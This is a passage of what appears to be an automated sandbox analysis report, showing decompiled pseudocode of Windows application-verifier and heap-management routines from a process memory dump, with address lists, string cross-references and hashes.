							_push("AVRF: -*- final list of providers -*- \n");
							E043C8EB8(E0433B910());
						}
						E043C9818();
						E0434E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E0435D3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x4435d8c; // 0x2711e28
					_t10 = _t92 + 0x30; // 0x2710fe0
					E043CEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x043c8633
0x043c8633
0x043c8642
0x043c8644
0x043c8648
0x043c864d
0x043c8654
0x043c8658
0x043c865c
0x043c8661
0x043c8663
0x043c8861
0x043c8864
0x043c8866
0x043c8872
0x043c8877
0x043c887e
0x043c8886
0x043c888b
0x043c888f
0x043c8891
0x043c8893
0x043c8893
0x043c8880
0x043c8880
0x043c8880
0x043c889b
0x043c88a2
0x043c88ac
0x043c88ac
0x00000000
0x043c88a4
0x043c88a4
0x043c88a6
0x00000000
0x00000000
0x043c88a8
0x043c88b1
0x043c88b1
0x043c88b6
0x043c88bb
0x043c88c2
0x043c88c4
0x043c88ef
0x043c88ef
0x043c88f4
0x043c88f6
0x043c88f6
0x043c88fc
0x043c88fc
0x043c88fe
0x043c8900
0x043c8902
0x043c8915
0x043c8915
0x043c892b
0x043c8943
0x043c8943
0x043c8948
0x043c895f
0x043c8961
0x043c8963
0x043c8965
0x043c8970
0x043c8972
0x043c8974
0x043c8978
0x043c8982
0x043c8987
0x043c8987
0x043c8974
0x043c898c
0x043c8994
0x043c8994
0x043c88d6
0x043c88db
0x043c88df
0x043c88e1
0x043c88ea
0x00000000
0x043c88ea
0x043c88e3
0x00000000
0x043c88e3
0x043c88a2
0x043c8868
0x00000000
0x043c8868
0x043c866c
0x043c885a
0x043c885a
0x00000000
0x043c885a
0x043c867e
0x043c8684
0x043c868f
0x043c8693
0x00000000
0x00000000
0x043c86a0
0x043c883f
0x043c8850
0x043c8852
0x043c8854
0x00000000
0x00000000
0x00000000
0x043c8854
0x043c86a6
0x043c86b2
0x043c86b5
0x043c86ba
0x043c86c5
0x043c86d4
0x043c8719
0x043c872e
0x043c872e
0x043c8730
0x00000000
0x00000000
0x043c8723
0x043c8728
0x043c872a
0x043c875e
0x00000000
0x043c872c
0x043c872c
0x00000000
0x043c872c
0x043c872a
0x043c8732
0x043c8740
0x043c874a
0x043c874c
0x043c874e
0x043c8768
0x043c876e
0x00000000
0x00000000
0x043c8774
0x043c877a
0x043c878e
0x043c8797
0x043c879c
0x043c879e
0x043c87a0
0x043c87ab
0x043c87ab
0x043c87ae
0x043c87b0
0x043c87b5
0x043c87b5
0x043c87bc
0x043c87c2
0x043c87cd
0x043c87d2
0x043c87d8
0x043c87d8
0x043c87da
0x043c87da
0x043c87e0
0x00000000
0x00000000
0x043c87ec
0x043c87f8
0x043c87fa
0x043c87fc
0x00000000
0x00000000
0x043c8802
0x043c8802
0x043c8806
0x043c880d
0x043c880f
0x043c881a
0x043c881a
0x043c881f
0x043c8834
0x00000000
0x043c8834
0x043c8750
0x043c8754
0x043c8757
0x00000000
0x043c86d6
0x043c86dc
0x043c86df
0x043c86e4
0x043c86ef
0x043c86fd
0x043c8711
0x00000000
0x043c8711

Strings

HandleTraces, xrefs: 043C890F
VerifierDlls, xrefs: 043C893D
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 043C86BD
VerifierFlags, xrefs: 043C88D0
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 043C86E7
VerifierDebug, xrefs: 043C8925
AVRF: -*- final list of providers -*- , xrefs: 043C880F

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 54a303e0af9f74a99a0444822d550ed7167e15c9442b72b2faf861817f3517f7
Instruction ID: 620a03174fa80b5a4bdadf23f82ebbc2093443e3364baa7d3021af650edd81ab
Opcode Fuzzy Hash: 54a303e0af9f74a99a0444822d550ed7167e15c9442b72b2faf861817f3517f7
Instruction Fuzzy Hash: E8912572641711AFF725FF648880B2AB7A8EF44B5AF06681DF9406B650D774FE00CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0433F113 Relevance: 8.2, Strings: 6, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0433F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x4436d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = E04350B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E0433F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E04339E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E0433BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x4436960 - 1;
						if( *0x4436960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E0433B910();
								} else {
									E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0433B910();
								__eflags =  *0x4435da8;
								if( *0x4435da8 == 0) {
									__eflags = 0;
									E043FFC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x4436960 - 1;
							if( *0x4436960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E0433B910();
							} else {
								E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0433B910();
							__eflags =  *0x4435da8;
							if( *0x4435da8 == 0) {
								__eflags = 0;
								E043FFC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E0433FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								E0435096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = E04353C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E043FF13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E04339E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E0433B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x4436960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E0433B910();
											} else {
												E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0433B910();
											__eflags =  *0x4435da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E043FFC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E04405FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									E04350B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = E04353C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = E04353C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E043FF058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = E04353C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = E04353C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E043FF058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x4436960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x4436960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E0433B910();
											} else {
												E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E0433B910();
											__eflags =  *0x4435da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E043FFC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E04405FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									E04350B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							E0435096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							E04350B10(_t547, _v60, _v24);
							_t274 = E04353C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = E04353C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E043FF058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = E04353C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = E04353C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E0433FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = E04353C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E043FF13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E04351EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E04350B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E0433F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}

0x0433f113
0x0433f120
0x0433f123
0x0433f127
0x0433f137
0x0433f13b
0x0439dc64
0x0439dc67
0x0433f1d5
0x0433f1d5
0x0433f1c7
0x0433f1cd
0x0433f1cd
0x0433f144
0x0439dc75
0x0439dc79
0x0439dc7b
0x0439dc8d
0x0439dc92
0x0439dc94
0x0439dc9a
0x0439dc9a
0x0439dc9a
0x0439dc9a
0x0439dc94
0x0439dca0
0x0439dca3
0x0439dca5
0x0433f202
0x0433f202
0x0433f205
0x0433f207
0x0439dcae
0x0433f20d
0x0433f21b
0x0433f21b
0x0433f21b
0x0433f228
0x0433f22a
0x0433f22e
0x0433f231
0x0433f23f
0x0433f243
0x0433f248
0x0433f24f
0x0433f256
0x0433f259
0x0433f263
0x0433f269
0x0433f26f
0x0433f275
0x0433f278
0x0433f27d
0x0433f45b
0x0433f461
0x0433f461
0x0433f283
0x0433f28d
0x0433f291
0x0433f292
0x0433f295
0x0433f3be
0x0433f3be
0x0433f3be
0x0433f29d
0x0433f2a1
0x0433f494
0x0433f498
0x0433f49d
0x0433f4a1
0x0433f4a5
0x0439dcb5
0x0439dcb7
0x00000000
0x00000000
0x0439dcbd
0x0433f4ab
0x0433f4b2
0x0439dcc2
0x0439dcc4
0x0439dcca
0x0439dcd0
0x0439dcd4
0x0439dcf3
0x0439dcf8
0x0439dcd6
0x0439dceb
0x0439dcf0
0x0439dcfe
0x0439dd03
0x0439dd08
0x0439dd10
0x0439dd12
0x0439dd17
0x0439dd17
0x0439dd1c
0x0439dd20
0x0439dd20
0x0439dcc4
0x0433f4b8
0x0433f4be
0x0433f4c1
0x0433f4c5
0x0433f4c7
0x0433f4cb
0x0433f4cd
0x0439dd28
0x0439dd28
0x0433f4d9
0x0433f4d9
0x0433f4dd
0x0433f4e1
0x0439dd30
0x0439dd37
0x00000000
0x00000000
0x0439dd3d
0x0439e0fe
0x0439e0fe
0x00000000
0x00000000
0x0439e104
0x0439e10a
0x0439e10e
0x0439e12d
0x0439e132
0x0439e110
0x0439e125
0x0439e12a
0x0439e138
0x0439e13d
0x0439e142
0x0439e14a
0x0439e14c
0x0439e151
0x0439e151
0x00000000
0x0433f4e7
0x0433f4f5
0x0433f4fa
0x0433f4fc
0x0439dd44
0x0439dd44
0x0439dd4a
0x0439dd4f
0x0439e159
0x0439e159
0x0433f1d2
0x0433f1d2
0x0433f1d4
0x0433f1d4
0x00000000
0x0433f1d4
0x0439dd6d
0x0439e156
0x0439e156
0x00000000
0x0439e156
0x0433f502
0x0433f507
0x0433f50c
0x0433f50e
0x0439dd80
0x0433f514
0x0433f514
0x0433f514
0x0433f516
0x0433f519
0x0439dd8a
0x0439dd90
0x0439dd97
0x0439dda9
0x0439dda9
0x0439dd97
0x0433f51f
0x0433f523
0x0433f529
0x0433f52c
0x0433f532
0x0439ddb3
0x0439ddb3
0x0433f53c
0x0433f541
0x0433f54b
0x0433f550
0x0433f55c
0x0433f563
0x0433f56d
0x0433f570
0x0433f575
0x0433f577
0x0433f577
0x0433f577
0x0433f577
0x0433f57d
0x0433f582
0x0439ddc2
0x0439ddca
0x0439ddce
0x0439ddda
0x0439ddde
0x0439deaf
0x0439deb3
0x0439dec1
0x0439dec7
0x0439dec7
0x0439dde4
0x0439dde8
0x0439ddea
0x0439dded
0x0439ddf7
0x0439ddfa
0x0439ddfc
0x0439de02
0x0439de08
0x0439de0a
0x0439de0d
0x0439de0f
0x0439de15
0x0439de18
0x0439de37
0x0439de3c
0x0439de1a
0x0439de2f
0x0439de34
0x0439de42
0x0439de47
0x0439de4d
0x0439de53
0x0439de55
0x0439de5a
0x0439de5a
0x0439de5f
0x0439de5f
0x0439de0d
0x0439de63
0x0439de66
0x0439de69
0x0439de72
0x0439de73
0x0439de77
0x0439de7c
0x0439de7e
0x0439de7f
0x0439de80
0x0439de81
0x0439de87
0x0439de88
0x0439de8d
0x0439de91
0x0439de91
0x0439de95
0x0439de95
0x0439de9d
0x0439dea0
0x0439dea5
0x0439dea5
0x0439ddde
0x0433f588
0x0433f58d
0x0433f58f
0x0439ded7
0x0433f595
0x0433f595
0x0433f595
0x0433f597
0x0433f59a
0x0439dee1
0x0439deea
0x0439def0
0x0439defb
0x0439defd
0x0439df08
0x0439df08
0x0439df08
0x0439df2b
0x0439df2b
0x0439def0
0x0433f5a0
0x0433f5a5
0x0433f5aa
0x0433f5af
0x0433f5b1
0x0439df3e
0x0433f5b7
0x0433f5b7
0x0433f5b7
0x0433f5b9
0x0433f5bc
0x0439df4a
0x0439df4c
0x0439df57
0x0439df57
0x0439df57
0x0439df5c
0x0439df5d
0x0439df61
0x0439df7c
0x0439df88
0x0439df89
0x0439df8d
0x0439df8d
0x00000000
0x0433f5bc
0x0433f4e1
0x0433f2a7
0x0433f2ad
0x0433f2b6
0x0433f2ba
0x0433f2bc
0x0439df97
0x0439df9d
0x0439df9d
0x0433f2c4
0x0433f2c7
0x0433f2cb
0x0433f2cd
0x0433f2d2
0x0433f2d6
0x0433f3c8
0x0433f3c8
0x0433f2dc
0x0433f2e1
0x0433f2e3
0x0439e0ed
0x0439e0f3
0x00000000
0x00000000
0x0439e0f9
0x00000000
0x0439e0f9
0x0433f2e9
0x0433f2eb
0x0433f2ef
0x0433f2f3
0x0433f302
0x0433f302
0x0433f304
0x0433f346
0x0433f346
0x0433f348
0x0433f34c
0x0433f3ea
0x0433f3f2
0x0433f3f6
0x0433f402
0x0433f406
0x0439e046
0x0439e049
0x0439e057
0x0439e05d
0x0439e05d
0x0433f40c
0x0433f410
0x0433f413
0x0433f423
0x0433f426
0x0433f428
0x0433f42e
0x0433f434
0x0439dfe4
0x0439dfe7
0x0439dfed
0x0439dff3
0x0439dff6
0x0439e015
0x0439e01a
0x0439dff8
0x0439e00d
0x0439e012
0x0439e020
0x0439e025
0x0439e02b
0x0439e031
0x0439e033
0x0439e038
0x0439e038
0x0439e03d
0x0439e03d
0x0439dfe7
0x0433f43a
0x0433f43d
0x0433f440
0x0433f442
0x0433f470
0x0433f471
0x0433f475
0x0433f47a
0x0433f47c
0x0433f47d
0x0433f47e
0x0433f47f
0x0433f482
0x0433f483
0x0433f488
0x0433f48c
0x0433f48c
0x0433f444
0x0433f444
0x0433f444
0x0433f446
